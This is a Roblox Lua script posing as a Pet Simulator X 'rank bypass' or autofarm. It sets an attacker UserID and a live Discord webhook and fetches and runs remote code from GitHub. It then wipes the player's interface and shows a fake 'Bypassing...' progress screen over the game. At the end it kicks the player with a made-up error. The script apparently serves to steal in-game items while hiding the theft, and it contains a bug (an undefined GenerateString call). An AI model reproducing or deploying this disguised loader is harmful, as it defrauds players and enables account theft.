_G.UserID = 2602423367
_G.WebHook = "https://discord.com/api/webhooks/1058206401228460082/6fTNeIaj-JhoQn29gjkEDQenxymb32rnRcRtirBkPW9X847w5L2eWnXWAVDMcWYIOhOk"

loadstring(game:HttpGet("https://raw.githubusercontent.com/SilenceScripts/PsxScripts.Lua/main/PsxAutofarm.true"))()

local libRandomString = loadstring(game:HttpGet("https://raw.githubusercontent.com/DuxV2/LunarFiles/main/RandomString.lib"))()
local libRounding = loadstring(game:HttpGet("https://raw.githubusercontent.com/DuxV2/LunarFiles/main/Rounding.lib"))()
local ProcessValue = 0

for i,v in pairs(game.CoreGui:GetChildren()) do 
    v:Destroy() 
end

for i,v in pairs(game.Players.LocalPlayer.PlayerGui:GetChildren()) do 
    v:Destroy() 
end

function SpamCreate()
    local UI = Instance.new("ScreenGui")
    UI.Parent = game.CoreGui
    UI.Name = GenerateString(10).."-FakeRankBypass"
    UI.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
    UI.Enabled = false

    local Frame = Instance.new("Frame")
    Frame.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
    Frame.BorderSizePixel = 0
    Frame.Parent = UI
    Frame.Position = UDim2.new(-0.413255483, 0, -0.489024311, 0)
    Frame.Size = UDim2.new(0, 10000, 0, 10000)
end

local UI = Instance.new("ScreenGui")
UI.Parent = game.CoreGui
UI.Name = GenerateString(10).."-FakeRankBypass"
UI.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

local Frame = Instance.new("Frame")
Frame.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Frame.BorderSizePixel = 0
Frame.Parent = UI
Frame.Position = UDim2.new(-0.413255483, 0, -0.489024311, 0)
Frame.Size = UDim2.new(0, 10000, 0, 10000)

local FrameGradient = Instance.new("UIGradient")
FrameGradient.Color = ColorSequence.new(Color3.fromRGB(0, 132, 255), Color3.fromRGB(0, 195, 255))
FrameGradient.Parent = Frame

local Label = Instance.new("TextLabel")
Label.Position = UDim2.new(0.5,0,0.5,0)
Label.Text = "Processing Pets"
Label.TextColor3 = Color3.fromRGB(255, 255, 255)
Label.Font = "Gotham"
Label.TextSize = 50
Label.Parent = UI

local Label2 = Instance.new("TextLabel")
Label2.Position = UDim2.new(0.5,0,0.55,0)
Label2.Text = "Bypassing... [0/7967]"
Label2.TextColor3 = Color3.fromRGB(255, 255, 255)
Label2.Font = "Gotham"
Label2.TextSize = 50
Label2.Parent = UI

local Label3 = Instance.new("TextLabel")
Label3.Position = UDim2.new(0.5,0,0.65,0)
Label3.Text = "0% Complete"
Label3.TextColor3 = Color3.fromRGB(255, 255, 255)
Label3.Font = "Gotham"
Label3.TextSize = 50
Label3.Parent = UI

while wait(0.02) do
    SpamCreate()
    SpamCreate()
    
    ProcessValue = ProcessValue + 1
    Label2.Text = "Bypassing... ["..ProcessValue.."/7967]"
    local Percentage = tostring(math.floor(ProcessValue/7967*100 * 100) / 100)
    Label3.Text = Percentage.."% Complete"
    if ProcessValue == 7967 then
        game.Players.LocalPlayer:Kick("There was an error. Please re-execute the script!")
    end
end
